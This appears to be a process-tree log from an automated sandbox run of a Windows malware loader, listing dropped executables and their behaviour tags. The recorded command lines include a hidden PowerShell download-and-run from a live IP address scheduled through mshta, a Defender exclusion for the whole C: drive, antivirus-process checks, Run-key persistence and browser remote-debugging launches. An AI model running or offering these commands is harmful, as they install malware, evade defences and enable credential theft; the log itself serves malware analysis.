        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1908,i,9108125535282850653,9129167109684334920,262144 --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:3
        18⤵
        
        PID:23812
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2596,i,9108125535282850653,9129167109684334920,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:2
        18⤵
        
        PID:23816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2116,i,9108125535282850653,9129167109684334920,262144 --variations-seed-version --mojo-platform-channel-handle=2872 /prefetch:8
        18⤵
        
        PID:23820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,9108125535282850653,9129167109684334920,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
        18⤵
        Uses browser remote debugging
        
        PID:24024
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,9108125535282850653,9129167109684334920,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        18⤵
        Uses browser remote debugging
        
        PID:24032
        
        C:\ProgramData\sjwl6pzmy5.exe
        
        "C:\ProgramData\sjwl6pzmy5.exe"
        14⤵
        
        PID:20484
        
        C:\Users\Admin\AppData\Local\Temp\FtprJCnO\Ld8f2nCUEMk8dKO7.exe
        
        C:\Users\Admin\AppData\Local\Temp\FtprJCnO\Ld8f2nCUEMk8dKO7.exe 0
        15⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\FtprJCnO\zfxqSC7w7O3isUDs.exe
        
        C:\Users\Admin\AppData\Local\Temp\FtprJCnO\zfxqSC7w7O3isUDs.exe 5856
        16⤵
        
        PID:19740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 19740 -s 752
        17⤵
        Program crash
        
        PID:19632
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 852
        16⤵
        Program crash
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\jmo89" & exit
        14⤵
        
        PID:14456
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        15⤵
        Delays execution with timeout.exe
        
        PID:14860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\KEBFBGDGHI.exe"
        11⤵
        
        PID:16100
        
        C:\Users\Admin\KEBFBGDGHI.exe
        
        "C:\Users\Admin\KEBFBGDGHI.exe"
        12⤵
        
        PID:16048
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:16032
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\HCAAEGIJKE.exe"
        11⤵
        
        PID:15892
        
        C:\Users\Admin\HCAAEGIJKE.exe
        
        "C:\Users\Admin\HCAAEGIJKE.exe"
        12⤵
        
        PID:15852
        
        C:\Users\Admin\AppData\Local\Temp\IMb5WmUq\WbyR6SgaSrNGocR7.exe
        
        C:\Users\Admin\AppData\Local\Temp\IMb5WmUq\WbyR6SgaSrNGocR7.exe 0
        13⤵
        
        PID:15824
        
        C:\Users\Admin\AppData\Local\Temp\IMb5WmUq\vyx2MYlaiRqvXfto.exe
        
        C:\Users\Admin\AppData\Local\Temp\IMb5WmUq\vyx2MYlaiRqvXfto.exe 15824
        14⤵
        
        PID:15776
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 15776 -s 824
        15⤵
        Program crash
        
        PID:17244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 15824 -s 892
        14⤵
        Program crash
        
        PID:17252
        
        C:\ProgramData\8gdtjm7gva.exe
        
        "C:\ProgramData\8gdtjm7gva.exe"
        9⤵
        
        PID:11124
        
        C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\pKTy4L06lQtAX5k5.exe
        
        C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\pKTy4L06lQtAX5k5.exe 0
        10⤵
        
        PID:12024
        
        C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\zdq3m60ChZCNruoa.exe
        
        C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\zdq3m60ChZCNruoa.exe 12024
        11⤵
        
        PID:12568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12568 -s 1088
        12⤵
        Program crash
        
        PID:16656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12024 -s 1576
        11⤵
        Program crash
        
        PID:19876
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\as2dj" & exit
        9⤵
        
        PID:17016
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        10⤵
        Delays execution with timeout.exe
        
        PID:17104
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        7⤵
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        7⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\is-FOA4U.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FOA4U.tmp\Bell_Setup16.tmp" /SL5="$70032,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        8⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        9⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\is-BFBPN.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BFBPN.tmp\Bell_Setup16.tmp" /SL5="$D028A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        10⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        11⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        7⤵
        
        PID:5524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        8⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        9⤵
        
        PID:1868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        10⤵
        
        PID:6008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        11⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        12⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        13⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        14⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        15⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        16⤵
        
        PID:13220
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        17⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        18⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        19⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        20⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        21⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        22⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        23⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        24⤵
        
        PID:812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        25⤵
        
        PID:7196
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        26⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        27⤵
        
        PID:7384
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        28⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        29⤵
        
        PID:7580
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        30⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        31⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        32⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        33⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        34⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        35⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        36⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        37⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        38⤵
        
        PID:8328
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        39⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        40⤵
        
        PID:8640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        41⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        42⤵
        
        PID:8868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        43⤵
        
        PID:8972
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        44⤵
        
        PID:9076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        45⤵
        
        PID:9164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        46⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        47⤵
        
        PID:9356
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        48⤵
        
        PID:9440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        49⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        50⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        51⤵
        
        PID:10128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        52⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        53⤵
        
        PID:10500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        54⤵
        
        PID:11016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        55⤵
        
        PID:11120
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice_service.exe"
        56⤵
        Modifies registry key
        
        PID:6356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe\"'"
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        7⤵
        
        PID:6692
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\10043970101\0306599398.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043970101\0306599398.exe"
        7⤵
        
        PID:8284
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043970101\0306599398.exe"
        8⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\10043980101\2eea388ab7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043980101\2eea388ab7.exe"
        7⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043980101\2eea388ab7.exe"
        8⤵
        
        PID:10456
    - - C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369110101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5884
    - - C:\Users\Admin\AppData\Local\Temp\10369120101\a0d870d378.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369120101\a0d870d378.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 832
        6⤵
        Program crash
        
        PID:2156
    - - C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369130101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3904
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3228
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 612
        7⤵
        Program crash
        
        PID:4996
    - - C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369140101\hYjiwV0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3168
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:5316
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffebd8ddcf8,0x7ffebd8ddd04,0x7ffebd8ddd10
        8⤵
        
        PID:4624
    - - C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369150101\EPTwCQd.exe"
        5⤵
        
        PID:4624
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2884
    - - C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369160101\7IIl2eE.exe"
        5⤵
        
        PID:2428
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4536
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        
        PID:6088
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5812
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        
        PID:3608
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        
        PID:1136
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369170101\u75a1_003.exe"
        5⤵
        
        PID:4816
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2712
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:636
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        
        PID:6128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        
        PID:12480
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\{180efafb-3950-4a53-9c03-54b0f2e9c443}\4d052cb8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{180efafb-3950-4a53-9c03-54b0f2e9c443}\4d052cb8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        
        PID:7316
        
        C:\Users\Admin\AppData\Local\Temp\{b92c9f8e-0f10-430b-a24f-4c7e8fd964df}\ce229d6c.exe
        
        C:/Users/Admin/AppData/Local/Temp/{b92c9f8e-0f10-430b-a24f-4c7e8fd964df}/\ce229d6c.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:10368
    - - C:\Users\Admin\AppData\Local\Temp\10369180101\9f4e8095f9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369180101\9f4e8095f9.exe"
        5⤵
        
        PID:13060
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn t9gromavgBN /tr "mshta C:\Users\Admin\AppData\Local\Temp\S6Rauj1tp.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        
        PID:13084
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn t9gromavgBN /tr "mshta C:\Users\Admin\AppData\Local\Temp\S6Rauj1tp.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:13232
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\S6Rauj1tp.hta
        6⤵
        
        PID:13092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OY2G4G49WHYELKWH1EYXRM3OYZIUKMIP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\TempOY2G4G49WHYELKWH1EYXRM3OYZIUKMIP.EXE
        
        "C:\Users\Admin\AppData\Local\TempOY2G4G49WHYELKWH1EYXRM3OYZIUKMIP.EXE"
        8⤵
        
        PID:8076
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
        5⤵
        
        PID:9880
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        Delays execution with timeout.exe
        
        PID:10664
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
